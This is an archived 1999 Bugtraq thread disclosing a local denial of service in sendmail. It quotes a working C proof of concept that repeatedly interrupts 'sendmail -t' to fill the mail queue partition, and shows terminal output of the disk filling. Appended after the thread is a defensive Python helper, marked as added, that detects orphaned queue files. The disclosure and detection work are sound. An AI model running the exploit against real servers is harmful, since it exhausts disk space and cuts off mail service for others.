Re: Possible local DoS in sendmail

From: KuRuPTioN (kuruptionat_private)
Date: Thu Apr 01 1999 - 11:41:41 PST

    Well, this is very interesting... this is what I found by running this
    binary for 30 seconds =)
    
    Before:
    
    # df /
    Filesystem         1024-blocks  Used Available Capacity Mounted on
    /dev/hda1             303251   87681   199909     30%   /
    # ps auwx | grep sendmail
    root      1427  0.0  0.4  1324   816  ?  S  Mar 27   0:00 sendmail:
    accepting connections on port 25
    # ls -l /var/spool/mqueue
    total 0
    #
    
    After (30 seconds running):
    
    # df /
    Filesystem         1024-blocks  Used Available Capacity Mounted on
    /dev/hda1             303251  107548   180042     37%   /
    (not too bad but another 30 seconds later another df)
    
    Filesystem         1024-blocks  Used Available Capacity Mounted on
    /dev/hda1             303251  146235   141355     51%   /
    
    # ps auwx | grep sendmail
    mail     17144 70.5  0.4  1348   820  p1 R   11:35   0:48
    /usr/sbin/sendmail -t
    root      1427  0.0  0.4  1324   816  ?  S  Mar 27   0:00 sendmail:
    accepting connections on port 25
    (sendmail kindly using 70% of my CPU)
    
    # ls -l /var/spool/mqueue
    total 115854
    -rw-------   1 mail     mail     118169600 Apr  1 11:37 dfLAA17144
    -rw-------   1 mail     mail            0 Apr  1 11:35 qfLAA17144
    -rw-------   1 mail     mail            0 Apr  1 11:35 xfLAA17144
    
    (once again a df)
    # df /
    Filesystem         1024-blocks  Used Available Capacity Mounted on
    /dev/hda1             303251  224734    62856     78%   /
    
    and once the hard drive becomes filled sendmail stops accepting connections
    since it has no temp space.
    
    # df /
    Filesystem         1024-blocks  Used Available Capacity Mounted on
    /dev/hda1             303251  287590        0    100%   /
    # ps auwx | grep sendmail
    mail     17144 68.5  0.4  1348   820  p1 R   11:35   2:33
    /usr/wrapped/sendmail -t
    root      1427  0.0  0.4  1324   816  ?  S  Mar 27   0:00 sendmail:
    rejecting connections on port 25: min free: 100
    #
    
    People, this is no april fools joke =)
    
    Raymond T Sundland
    MCSE, MCP, MCP+Internet
    PGP Key: finger pgpat_private
    
    |-----Original Message-----
    |From: Bugtraq List [mailto:BUGTRAQat_private]On Behalf Of Lukasz
    |Luzar
    |Sent: Thursday, April 01, 1999 9:00 AM
    |To: BUGTRAQat_private
    |Subject: Possible local DoS in sendmail
    |
    |
    |Hi,
    |It seems that sendmail run with the -t option does NOT block SIGINT ...
    |While we are sending data to its stdin, if we press CTRL-C the process
    |is killed, but an unfinished letter remains in the queue.
    |It stays there quite long - long enough to fill the partition on
    |disk where
    |/var/spool/mqueue resides.
    |When it happens, sendmail doesn't allow new connections - so it is a kind
    |of DoS attack for this service.
    |It has been tested on all new versions of sendmail up to the current (8.9.3).
    |
    |Example ...
    |
    | --- CUT HERE ----
    | #include <stdio.h>
    | #include <unistd.h>
    | #include <signal.h>
    | #include <sys/wait.h>
    |
    | #define DELAY 5              /* time in seconds needed to reach
    |                                 MaxMessageSize limit */
    | #define SM_PATH "/usr/sbin/sendmail -t"
    |
    | void main()
    | {
    | 	FILE	*fd;
    | 	int	pid;
    |
    | 	for(;;) {
    | 		if(( pid = fork()) == 0) {
    | 			setpgrp();
    | 			if(( fd = popen( SM_PATH, "w")) == NULL)
    | 				fprintf( stderr, "popen error\n");
    |
    | 			for(;;) fputc( 'A', fd);
    | 		} else {
    | 			sleep( DELAY);
    | 			kill( (-1) * pid, SIGINT);
    | 			fprintf( stdout, "next\n");
    | 			wait( NULL);
    | 		}
    | 	}
    | }
    |--- CUT HERE ---
    |
    |Regards,
    |
    |---
    |Lukasz Luzar                               K.K.I.
    |http://noname.kki.krakow.pl/           lluzarat_private
    |
    
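The queue listing above shows the signature an operator can watch for: a large df* data file sitting beside a zero-byte qf* control file, long after the submitting process died. The following audit helper is an added example (not code from either poster, and not part of sendmail): it walks an mqueue directory, reports df* files whose control file is missing or empty, and skips entries younger than a threshold so that a message still being received is not mistaken for an orphan. The sample queue it builds is constructed to mirror the names in the listing, with sizes scaled down; the qf* contents are placeholders, not real sendmail control-file syntax.

```python
import os
import tempfile
import time
from pathlib import Path

def find_orphaned_queue_files(mqueue_dir, min_age_seconds=300):
    """Audit an mqueue directory. Returns (name, size, reason) for every df*
    data file whose qf* control file is missing or empty and that is at
    least min_age_seconds old. Newer entries are skipped: a message that is
    still being received legitimately has an empty qf* for a moment.
    Nothing is deleted; this only reports."""
    queue = Path(mqueue_dir)
    now = time.time()
    found = []
    for df in sorted(queue.glob("df*")):
        st = df.stat()
        if now - st.st_mtime < min_age_seconds:
            continue
        qf = queue / ("qf" + df.name[2:])
        if not qf.exists():
            found.append((df.name, st.st_size, "no control file"))
        elif qf.stat().st_size == 0:
            found.append((df.name, st.st_size, "empty control file"))
    return found

def build_sample_queue():
    """Constructed sample modelled on the listing in the post (same naming
    pattern, zero-byte qf/xf beside a large df); sizes are scaled down and
    the qf contents below are placeholders, not real control-file syntax."""
    d = Path(tempfile.mkdtemp(prefix="mqueue-sample-"))
    old = time.time() - 3600
    # interrupted submission: large df, empty qf and xf, an hour old
    (d / "dfLAA17144").write_bytes(b"A" * 65536)
    (d / "qfLAA17144").write_bytes(b"")
    (d / "xfLAA17144").write_bytes(b"")
    # healthy queued message: df with a populated control file
    (d / "dfMAA00001").write_bytes(b"hello\n")
    (d / "qfMAA00001").write_bytes(b"placeholder control data\n")
    # message still being received right now: empty qf, but brand new
    (d / "dfNAA00002").write_bytes(b"A" * 1024)
    (d / "qfNAA00002").write_bytes(b"")
    for name in ("dfLAA17144", "qfLAA17144", "xfLAA17144",
                 "dfMAA00001", "qfMAA00001"):
        os.utime(d / name, (old, old))
    return str(d)

if __name__ == "__main__":
    for name, size, reason in find_orphaned_queue_files(build_sample_queue(), 60):
        print(f"{name}: {size} bytes ({reason})")
```

Run against a real /var/spool/mqueue as the queue owner, the report is what you would act on before the partition reaches the point where sendmail logs "rejecting connections ... min free", as in the final ps output above.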
    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:41:19 PDT